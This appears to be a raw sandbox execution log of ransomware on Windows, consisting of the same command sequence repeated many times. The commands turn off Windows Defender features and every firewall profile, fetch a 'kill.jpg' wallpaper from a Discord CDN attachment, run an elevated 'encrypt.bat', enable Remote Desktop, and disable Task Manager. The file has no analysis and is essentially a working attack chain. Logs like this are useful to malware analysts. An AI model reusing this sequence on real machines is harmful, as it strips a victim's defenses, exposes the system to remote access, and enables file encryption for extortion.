netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

